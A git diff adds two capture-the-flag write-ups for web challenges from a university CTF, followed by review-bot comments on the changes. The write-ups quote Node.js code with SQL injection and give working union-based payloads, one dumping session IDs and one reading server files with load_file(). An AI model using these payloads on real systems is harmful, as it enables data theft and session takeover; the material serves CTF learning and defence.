diff --git a/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/EatMoreCookiespt2.zip b/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/EatMoreCookiespt2.zip new file mode 100644 index 0000000..ad84362 Binary files /dev/null and b/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/EatMoreCookiespt2.zip differ diff --git a/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/README.md b/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/README.md new file mode 100644 index 0000000..5593906 --- /dev/null +++ b/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/README.md 
@@ -0,0 +1,84 @@ +# Eat More Cookies (Part 2) +> `-` + +## About the Challenge +We got a website and also the source code (You can download the source code [here](EatMoreCookiespt2.zip)). Here is the preview of the website + +![preview](images/preview.png) + +If we check the source code, especially this part: + +```js +app.get("/searchcookies", isAuthenticated, async (req, res, next) => { + cookies = req.query.cookies; + + const query = `SELECT * FROM cookies WHERE flavor = "${cookies}"`; + + pool.query(query, (err, result) => { + if(err){ + return next(err) + } + + return res.status(200).render("index", {cookies: result || []}) + }); +}) +``` + +The `cookies` parameter is vulnerable to SQL injection, and we can get the flag by accessing `/flag` endpoint + +```js +app.get("/flag", isAdmin, (req, res, next) => { + + return res.json({"flag": "WSUCTF{F4ke_Flag}"}) +}) +``` + +But we need to login as administrator first: + +```js +app.post("/adminLogin", async (req, res, next) => { + const { username, password } = req.body; + const query = 'SELECT * FROM users WHERE username = ? LIMIT 1'; + try { + pool.query(query, [username], async (err, result) => { + + user = result[0]; + + console.log(user); + + if(!user){ + return res.json({message: "User not found. Please try again."}) + } + + let comparePassword = await bcrypt.compare(password, user.password); + + if(username == "Administrator" && comparePassword){ + req.session.username = "Admin"; + req.session.isAdmin = true; + + return res.json({"message": "Successfully logged in as adminstrator."}) + } else if(comparePassword){ + return res.json({"message": "You are logged in, but you aren't administrator. You could've used the regular login instead!"}) + } else { + return res.json({"message": "Invalid username or password. Please try again."}) + } + }) + } catch (err) { + return next(err) + } + +}) +``` + +## How to Solve? +To solve this chall, im using unintended way. 
Im using `load_file()` MySQL function to read local file and then read `app.js` file + +``` +" union select 1,load_file('/app/src/app.js'),3-- - +``` + +![flag](images/flag.png) + +``` +WSUCTF{Sess1on_IDs_m4ch_more_v4lner9ble_th9n_I_TH0ught} +``` \ No newline at end of file diff --git a/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/images/flag.png b/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/images/flag.png new file mode 100644 index 0000000..7d8b944 Binary files /dev/null and b/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/images/flag.png differ diff --git a/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/images/preview.png b/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/images/preview.png new file mode 100644 index 0000000..acd3ad3 Binary files /dev/null and b/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/images/preview.png differ diff --git a/2024/Wayne State University - CTF24/Eat More Cookies/EatMoreCookies.zip b/2024/Wayne State University - CTF24/Eat More Cookies/EatMoreCookies.zip new file mode 100644 index 0000000..dd52503 Binary files /dev/null and b/2024/Wayne State University - CTF24/Eat More Cookies/EatMoreCookies.zip differ diff --git a/2024/Wayne State University - CTF24/Eat More Cookies/README.md b/2024/Wayne State University - CTF24/Eat More Cookies/README.md new file mode 100644 index 0000000..1fddf77 --- /dev/null +++ b/2024/Wayne State University - CTF24/Eat More Cookies/README.md 
@@ -0,0 +1,51 @@ +# Eat More Cookies +> `-` + +## About the Challenge +We got a website and also the source code (You can download the source code [here](EatMoreCookies.zip)). Here is the preview of the website + +![preview](images/preview.png) + +If we check the source code, especially this part: + +```js +app.get("/searchcookies", isAuthenticated, async (req, res, next) => { + cookies = req.query.cookies; + + const query = `SELECT * FROM cookies WHERE flavor = "${cookies}"`; + + pool.query(query, (err, result) => { + if(err){ + return next(err) + } + + return res.status(200).render("index", {cookies: result || []}) + }); +}) +``` + +The `cookies` paramter is vulnerable to SQL injection, and the flag is inside another table called `sessions` + +```js +try { + const adminCookieData = {"cookie":{"originalMaxAge":86400000,"expires":"2024-04-20T19:21:29.400Z","httpOnly":true,"path":"/", "sameSite": "lax"},"username":"Admin","isAdmin":true}; + const sessionId = 'WSUCTF{F4ke_Flag}'; + const expirationTimestamp = 1712172179; + + const serializedData = JSON.stringify(adminCookieData); + + const query = `INSERT INTO sessions (session_id, data, expires) VALUES (?, ?, ?)`; +``` + +## How to Solve? +To get every `session_id` inside `sessions` table, im using this payload: + +``` +" union select 1,(select group_concat(session_id) from sessions),3-- - +``` + +![flag](images/flag.png) + +``` +{WSUCTF24:S3arching_Thr0ugh_Very_Expr3ssive_DBz} +``` \ No newline at end of file diff --git a/2024/Wayne State University - CTF24/Eat More Cookies/images/flag.png b/2024/Wayne State University - CTF24/Eat More Cookies/images/flag.png new file mode 100644 index 0000000..24ea088 Binary files /dev/null and b/2024/Wayne State University - CTF24/Eat More Cookies/images/flag.png differ 
diff --git a/2024/Wayne State University - CTF24/Eat More Cookies/images/preview.png b/2024/Wayne State University - CTF24/Eat More Cookies/images/preview.png new file mode 100644 index 0000000..0c2c63d Binary files /dev/null and b/2024/Wayne State University - CTF24/Eat More Cookies/images/preview.png differ diff --git a/2024/Wayne State University - CTF24/README.md b/2024/Wayne State University - CTF24/README.md new file mode 100644 index 0000000..78fda08 --- /dev/null +++ b/2024/Wayne State University - CTF24/README.md @@ -0,0 +1,7 @@ +# Wayne State University - CTF24 +CTF writeup for The Wayne State University - CTF24. I took part in this CTF competition with the Heroes Cyber Security team and secured the 1st place out of 75 teams + +| Category | Challenge | +| --- | --- | +| Web | [Blog](/2024/Wayne%20State%20University%20-%20CTF24/Eat%20More%20Cookies/) +| Web | [Blog](/2024/Wayne%20State%20University%20-%20CTF24/Eat%20More%20Cookies%20(Part%202)/) \ No newline at end of file diff --git a/README.md b/README.md index d94888f..ef78db1 100644 --- a/README.md +++ b/README.md @@ -11,6 +11,7 @@ There are __551__ CTF writeups that have been made in this repository | Event Name | Team | Ranking | | ---------- | ---- | ------- | +| Wayne State University - CTF24 | 1 | | KnightCTF 2024 | Heroes Cyber Security | 1 | | DeconstruCT.F 2023 | aseng_fans_club | 1 | | The Odyssey CTF | aseng_fans_club | 1 | @@ -48,6 +49,7 @@ List of CTF events that i have joined before | 0xL4ugh CTF 2024 | Yes |[Link](/2024/0xL4ugh%20CTF%202024/) | | UNbreakable International 2024 - Team Phase | Yes |[Link](/2024/UNbreakable%20International%202024%20-%20Team%20Phase/) | | SwampCTF 2024 | Yes |[Link](/2024/SwampCTF%202024/) | +| Wayne State University - CTF24 | Yes |[Link](/2024/Wayne%20State%20University%20-%20CTF24/) | ### Local Events | Event Name | Writeup Available? | Writeup Link |
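Review bot: In the `Eat More Cookies (Part 2)/README.md` hunk, the solve section never explains why `load_file('/app/src/app.js')` produces the flag when the `/flag` handler quoted a few lines earlier returns `WSUCTF{F4ke_Flag}`; state where in the deployed `app.js` the real flag was found, otherwise the two quoted snippets read as contradicting the final flag block. The root cause and fix also deserve one sentence each, since the fix is already visible in the quoted code: `/searchcookies` builds its query with `` `SELECT * FROM cookies WHERE flavor = "${cookies}"` `` by string interpolation, while `/adminLogin` in the same file uses `'SELECT * FROM users WHERE username = ? LIMIT 1'` with `pool.query(query, [username], ...)`, which is exactly the placeholder pattern `/searchcookies` should have used. Two defects in the quoted `/adminLogin` handler are worth flagging rather than reproducing silently: its callback never checks `err` before indexing `result[0]`, and `console.log(user)` writes the whole user row, bcrypt hash included, to the application logs. Minor: `> \`-\`` under the title looks like an unfilled placeholder for the challenge description, and `im using unintended way` / `Im using` should read `I'm using an unintended way` / `I'm using`.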
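Review bot: In the `Eat More Cookies/README.md` hunk, the quoted seeding snippet (`const sessionId = 'WSUCTF{F4ke_Flag}'` stored next to `"username":"Admin","isAdmin":true`) is the most instructive part of the challenge and gets no commentary: the session identifier is the secret that stands in for the administrator's credentials, so an injection in a read-only search endpoint becomes an admin session takeover as soon as the `sessions` table is readable from the same database connection. Suggest adding that point plus the mitigation it implies (keep session storage out of the application's query reach, e.g. a separate store or a separate DB user with no grant on `sessions`), alongside the root cause (`flavor = "${cookies}"` assembled by interpolation) and the fix (a `?` placeholder with the value passed as a parameter, as `/adminLogin` in Part 2 does). Typos: `paramter` -> `parameter`, `im using` -> `I'm using`; `> \`-\`` under the title again looks like an unfilled description placeholder. The flag block is written as `{WSUCTF24:...}` while Part 2 uses `WSUCTF{...}`; if that is a transcription slip rather than the flag as issued, it is worth double-checking against the scoreboard.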
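Review bot: In the `2024/Wayne State University - CTF24/README.md` hunk, both table rows are labelled `Blog` but link to the `Eat More Cookies` and `Eat More Cookies (Part 2)` directories; the Challenge cells should carry those two names. Both rows also lack the closing `|` that the header row `| Category | Challenge |` has, and the file is committed without a trailing newline.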
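Review bot: In the first root `README.md` hunk (`@@ -11,6 +11,7 @@`), the added row `| Wayne State University - CTF24 | 1 |` has two cells where the table has three (`Event Name | Team | Ranking`), so `1` lands in the Team column and Ranking is left empty; it should read `| Wayne State University - CTF24 | Heroes Cyber Security | 1 |`, matching the team named in the event README. The hunk's context line also states `There are __551__ CTF writeups that have been made in this repository`, and that count is not bumped even though this change adds two writeups.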